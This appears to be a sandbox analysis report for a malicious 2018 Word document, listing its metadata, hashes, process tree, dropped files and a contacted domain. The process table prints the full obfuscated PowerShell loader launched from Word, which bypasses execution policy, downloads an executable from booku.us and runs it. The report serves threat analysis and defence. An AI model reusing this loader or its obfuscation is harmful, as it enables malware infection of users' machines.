File name: | 4b8615fd5cc0220037e41f208c14e7d2499d6ff18c984807fd054d39da352375 |
Full analysis: | https://app.any.run/tasks/31d494d6-1138-449b-8c61-36ecad92504a |
Verdict: | Malicious activity |
Analysis date: | November 14, 2018, 18:37:52 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Yvette Rosselat, Number of Characters: 478618, Create Time/Date: Mon Nov 12 04:43:19 2018, Last Saved Time/Date: Mon Nov 12 04:43:19 2018, Security: 0, Keywords: officia, rerum, hic, Last Saved By: Yvette Rosselat, Revision Number: 825055, Subject: Remise N876104635, Template: Normal, Title: Remise N876104635, Total Editing Time: 03:00, Number of Words: 68374, Number of Pages: 45, Comments: Temporibus id amet at sapiente similique. |
MD5: | 4A0952E2A3CDE7A88D15671227ED59AB |
SHA1: | FC3EA5F5F01D4CF5C59B2FA0283C9098F058FA2C |
SHA256: | 4B8615FD5CC0220037E41F208C14E7D2499D6FF18C984807FD054D39DA352375 |
SSDEEP: | 6144:8A0GWb52ZWSfnugIzJpCBG/Ao9ekhpTwkHm:8A0GWb5DSfiJx0oDHm |
.doc | | | Microsoft Word document (33.9) |
---|
CompObjUserTypeLen: | 39 |
---|---|
CompObjUserType: | Microsoft Office Word 97-2003 Document |
Software: | Microsoft Office Word |
Author: | Yvette Rosselat |
Characters: | 478618 |
CreateDate: | 2018:11:12 04:43:19 |
ModifyDate: | 2018:11:12 04:43:19 |
Security: | None |
Keywords: | officia, rerum, hic |
LastModifiedBy: | Yvette Rosselat |
RevisionNumber: | 825055 |
Subject: | Remise N876104635 |
Template: | Normal |
Title: | Remise N876104635 |
TotalEditTime: | 3.0 minutes |
Words: | 68374 |
Pages: | 45 |
Comments: | Temporibus id amet at sapiente similique. |
Paragraphs: | 181 |
Bytes: | -2147483648 |
HiddenSlides: | -2147483648 |
Lines: | 2974 |
Notes: | -2147483648 |
Slides: | -2147483648 |
Company: | Aeby Sàrl. |
Manager: | Denise Sansonnens |
Category: | sit |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2700 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\4b8615fd5cc0220037e41f208c14e7d2499d6ff18c984807fd054d39da352375.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2104 | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\uhpgyr.exe $chxgjuiy='iyjflpdx.';$xjmxaf=' Pro';$lyepvac='nPol';$miiecld='exe'')';$iljgju='$hj = ''hw';$nxcswau='se -force';$udsy='e-';$ivxyoe='yste';$vyxfo='-Object S';$fagpnwa='m.Net.W';$ccxou='h); Start';$yzmva='dFile(''';$uclekne='icy By';$uuvn='https:/';$rxsjoe0='ooku.us/w';$enro5='env:';$evcyxzcc='ope';$bcun='Item (f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$ezpbjfu='temp + ''\';$iey=') -recur';$wpebnbxy1='ss -Sc';$omxfuoa='cess; $p';$xemxu='hfhj'';';$bdfdea='ath;Remov';$uuyuw='ss $p';$iwknjz1='uyvqsd';$eggjnq='ath=($env';$uueou15='lc.';$uiu='p-content';$nhfjwlcxs0='.Downl';$oljkdaht='ebclient)';$xpeiija='Executio';$immcpyin='/images';$eeblv=';(New';$ehqzt05='ecg''';$elplpda='/theme';$kpei='oa';$hdueo='belleza';$dlmcu=';';$fdve='-Proce';$wruqogv9='s/';$wjeegr='/b';$glpe=':temp+''\s';$jdiyh='exe'',$pat';$ibqeu='Set-';$aiygyo='/f';$ouuain='pa'; Invoke-Expression ($iljgju+$xemxu+$ibqeu+$xpeiija+$lyepvac+$uclekne+$ouuain+$wpebnbxy1+$evcyxzcc+$xjmxaf+$omxfuoa+$eggjnq+$glpe+$chxgjuiy+$miiecld+$eeblv+$vyxfo+$ivxyoe+$fagpnwa+$oljkdaht+$nhfjwlcxs0+$kpei+$yzmva+$uuvn+$wjeegr+$rxsjoe0+$uiu+$elplpda+$wruqogv9+$hdueo+$immcpyin+$aiygyo+$uueou15+$jdiyh+$ccxou+$fdve+$uuyuw+$bdfdea+$udsy+$bcun+$enro5+$ezpbjfu+$iwknjz1+$ehqzt05+$iey+$nxcswau+$dlmcu); | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\uhpgyr.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAC0A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\DotNetTypes.format.ps1xml | xml | |
MD5:1AB2FD4B6749AD6831C86411FDCAFB48 | SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\Certificate.format.ps1xml | xml | |
MD5:C93A361112351B30E2C959E72789952D | SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:256A3EF47ED32A3D3038855D49DF0319 | SHA256:151B56C71BC28DD4D752808CE3A9352E96D9FA381320511F87B327A8208F5DD0 | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$8615fd5cc0220037e41f208c14e7d2499d6ff18c984807fd054d39da352375.doc | pgc | |
MD5:85B9009F448F67ACC7A5FD66EC672D21 | SHA256:4A911D98179D45EBABEA0F2A35EA5A326AD8ACF99087F802084A6589633DECA7 | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\Diagnostics.Format.ps1xml | text | |
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC | SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689 | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll | executable | |
MD5:A84B6952AB6A297CCE6C085FA8AB06CB | SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\en-US\about_Break.help.txt | text | |
MD5:AEDBFC39660AE3E030761ED4782CE328 | SHA256:13231768182599EC2C15B281F5E313E36428327479DA7F05FF8A92C5479214F2 | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\en-US\about_arrays.help.txt | text | |
MD5:04BB4AA2CF5A5D3EAD1D9F6EEA89C034 | SHA256:0C058DF25203E39D339F127C0AE8235EE3E2E77F33B57F894E8E5A4AE6243EC8 | |||
2700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\en-US\about_Command_Syntax.help.txt | text | |
MD5:847B0C3A6010660492ECC1D88A69210D | SHA256:7D7EE4469AE76392317DC7E16E716B5767BD7EEFCDC39F60C51ED1DA2E99AE2B |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2104 | uhpgyr.exe | 31.186.83.114:443 | booku.us | ATM S.A. | PL | unknown |
Domain | IP | Reputation |
---|---|---|
booku.us |
| unknown |